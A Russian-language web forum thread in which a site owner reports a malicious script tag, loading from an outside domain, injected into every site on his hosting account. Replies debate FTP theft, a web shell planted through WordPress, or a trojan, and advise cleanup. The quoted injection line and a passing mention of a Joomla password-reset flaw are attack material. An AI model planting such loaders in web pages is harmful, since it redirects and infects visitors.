Появился редирект на сайте, может кто сталкивался

charly
На сайте с 22.02.2007
Offline
112
1831

Видимо взломали FTP аккаунт т.к. на всех сайтах висящих на нем появляется код типа:

<script src="http://proc30esso.rr.nu/pmg.php?dr=1"></script>

URL меняется... Иногда редиректит иногда нет на этот URL

Пробовал обновить WP, отключал плагины, менял тему - код все равно остается...

Если кто с таким сталкивался, помогите пожалуйста...

Мобильные приложения ннадо?
R
На сайте с 18.12.2009
Offline
92
#1

Пароль на ftp меняли?

WebGomel
На сайте с 29.10.2011
Offline
78
#2
charly:
Видимо взломали FTP аккаунт

Не совсем верные выводы...

Взломали ваш WP через уязвимости, залили web-shell, и через него дописали всё что угодно на все сайты на аккаунте.

Никому ваш фтп и близко не нужен, так что обновляем сайты и обязательно ищем шелл.

Нужна будет помощь - стучите, помогу.

Удалённый системный администратор ( https://remadmin.com )
neonlabs
На сайте с 21.07.2011
Offline
105
#3

Выводы верные, судя по

т.к. на всех сайтах висящих на нем появляется код

Шелл, залитый через WP не будет иметь таких привилегий.

Сначала переустановить ОС, потом сменить пасс на фтп и прочее.

Выполняю заявки GoGetLinks, Miralinks, Rotapost за 30 рублей под ключ
R
На сайте с 24.01.2008
Offline
180
#4
neonlabs:
Выводы верные, судя по
Шелл, залитый через WP не будет иметь таких привилегий.
Сначала переустановить ОС, потом сменить пасс на фтп и прочее.

С чего это шелл не будет иметь привелегий? Ж Будет)

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
WebGomel
На сайте с 29.10.2011
Offline
78
#5
neonlabs:

Шелл, залитый через WP не будет иметь таких привилегий.

Почему это не будет? Через шелл доступна вся дирректория пользователя, точно в том же объёме как и фтп аккаунт.

neonlabs:

Сначала переустановить ОС

😮 А где ТС сказал что у него дедик или ВПС? Больше походит на обычный шаред с несколькими сайтами в аккаунте. Как он там ОС переустановит?

neonlabs
На сайте с 21.07.2011
Offline
105
#6
Rxp:
С чего это шелл не будет иметь привелегий? Ж Будет)

Если все сайты были созданы на одном админском акке, или ещё хуже, на рутовом, тогда да, может иметь привилегии.

Больше вводных, ТС 🙅

---------- Добавлено 01.03.2012 в 18:01 ----------

WebGomel:


😮 А где ТС сказал что у него дедик или ВПС? Больше походит на обычный шаред с несколькими сайтами в аккаунте. Как он там ОС переустановит?

Это же очевидно, что я не имела ввиду ОС сервака.

ТС легко мог зацепить троя на свой комп.

siv1987
На сайте с 02.04.2009
Offline
427
#7
neonlabs:
Шелл, залитый через WP не будет иметь таких привилегий.

Чушь. Зависит от прав на хостинге, а не из какой кмс был залит шелл.

WebGomel
На сайте с 29.10.2011
Offline
78
#8
neonlabs:

ТС легко мог зацепить троя на свой комп.

Хорошо, допустим даже и такой вариант - подцепил трояна, тот украл пароль от фтп с компа и натворил делов на сайтах, чем тут переустановка ОС поможет? Если троян на компе, то его ведь всё равно нужно найти.

Но я, извините, к этой версии не склоняюсь, вордпрессы вижу взломанные чуть ли не каждый день, и льют в них что угодно, и даже вообще с наглухо отключённым доступом по фтп всё равно льют. Да и не знаем мы на чём там остальные сайты у ТС, может там где у него джумла стоит старенькая, в которой пароль админа простой кавычкой сбрасывается, так там вообще делов на 2 минуты и никакое фтп не нужно. А может например такой вариант, с которым я очень часто сталкиваюсь - ставят движок (например на поддомен), с паролями не заморачиваются, типа просто попробовать. Пробуют пару дней, ковыряют, типа сайт делают, а потом забивают. И так и висит потом этот движок на аккаунте на каком - нибудь поддомене или в папке годами никому не нужный - а ведь это по сути настежь распахнутые двери для взлома:)

Зато вот почему то знаю людей, которые просто постоянно следят за актуальность ПО сайта и никакие "трояны" их не берут 😂

neonlabs
На сайте с 21.07.2011
Offline
105
#9

Это просто какой-то сломанный телефон. 🙅

Шелловодов то..

FI
На сайте с 15.12.2010
Offline
27
#10

Качай сайт на компьютер и копай код. Я с подобным дело не имел, но первое что бы сделал, так это провёл поиск ссылки или подключенным левым js скриптам по файлам cms, чтобы сузить область поиска. Не панацея конечно, но всяко лучше тупой бесцельной паники.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий